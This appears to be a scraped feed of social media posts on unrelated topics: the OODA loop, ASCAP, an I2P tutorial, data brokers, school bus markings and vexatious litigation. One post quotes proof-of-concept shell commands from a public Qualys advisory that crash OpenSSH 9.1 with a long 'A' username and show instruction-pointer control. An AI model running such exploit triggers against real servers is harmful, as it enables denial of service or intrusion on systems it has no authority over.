I don't know who needs to see/know this, but here's a good drop of helpful everyday info::
https://en.m.wikipedia.org/wiki/OODA_loop
The OODA loop is the cycle observe–orient–decide–act, developed by military strategist and United States Air Force Colonel John Boyd. Boyd applied the concept to the combat operations process, often at the operational level during military campaigns. It is now also often applied to understand commercial operations and learning processes. The approach explains how agility can overcome raw power in dealing with human opponents. It is especially applicable to cyber security and cyberwarfare.[1]
Diagram of the OODA loop
The OODA loop has become an important concept in litigation,[2] business,[3] law enforcement,[4] management education,[5] and military strategy. According to Boyd, decision-making occurs in a recurring cycle of observe–orient–decide–act. An entity (whether an individual or an organization) that can process this cycle quickly, observing and reacting to unfolding events more rapidly than an opponent, can thereby "get inside" the opponent's decision cycle and gain the advantage.
#til ASCAP are garbage people scraping money.
The American Society of Composers, Authors and Publishers::::
"...the group has created controversy for its efforts in the past, including once in late 1990s when it tried to charge the Girl Scouts of America for singing copyrighted songs around a campfire, even pledging to sue them if necessary. It also lost a court decision that would have charged royalties off cell phone ringtones."
A gentle reminder that book nooks exist, and are awesome. #Bookwyrm #bookclub #booknooks #bookcollector #bookcollecting
🧄 #I2P Browser Button Tutorial For #Pinephone / #Linux Phones / Devices
Includes #Librewolf profile pre-setup + desktop shortcut + icon + starting script starts #i2prouter upon browser open & stops i2prouter on browser close
#Tutorial #privacy #I2P #anonymity #HumanRights #p2p #proxy #anonymous #Pinephone #decentralization #crypto #encryption
📝 Tutorial / 📸 Photos:
This post by the Qualys Security Advisory team demonstrating rip/pc control on OpenSSH 9.1 (running on OpenBSD!) is savage: https://seclists.org/oss-sec/2023/q1/92
Here I was thinking this bug was hopeless and they one-line it without writing new code:
$ cp -i /usr/bin/ssh ./ssh
$ sed -i s/OpenSSH_9.1/FuTTYSH_9.1/g ./ssh
$ user=`perl -e 'print "A" x 300'` && while true ;do ./ssh -o NumberOfPasswordPrompts=0 -o Ciphers=aes128-ctr -l
"$user:$user" 192.168.56.123 ;done
...
#1 0x4141414141414141 in ?? ()
wait until the politicians freaking out about tiktok realize Chinese intelligence can easily purchase entire mental health histories thanks to the oversight-optional data hoovering hellscape they created by opposing FTC enforcement and privacy legislation.
won't they feel silly.
https://www.washingtonpost.com/technology/2023/02/13/mental-health-data-brokers/
The three horizontal black lines on the side of a school bus are there for emergency responders. In an emergency where the doors and windows can't be opened and they need to cut into the bus, the lines show the positions of the floor boards, the bottom ...
https://www.huffpost.com/entry/school-bus-black-stripes-explained_n_604ed70ac5b65bed87dbf756
Original tweet : https://nitter.privacydev.net/tilbots/status/1624938434849656832
I don't know who need to hear this, but as a reminder- abuse of the legal system _is_ a thing and _is_ recognized in court.
https://en.m.wikipedia.org/wiki/Category:Abuse_of_the_legal_system
Example:::
Vexatious litigation is legal action which is brought solely to harass or subdue an adversary. It may take the form of a primary frivolous lawsuit or may be the repetitive, burdensome, and unwarranted filing of meritless motions in a matter which is otherwise a meritorious cause of action. Filing vexatious litigation is considered an abuse of the judicial process and may result in sanctions against the offender.
Ever wonder what early Radio Amateurs used and heard using spark transmitters?
Ask me about my keyboard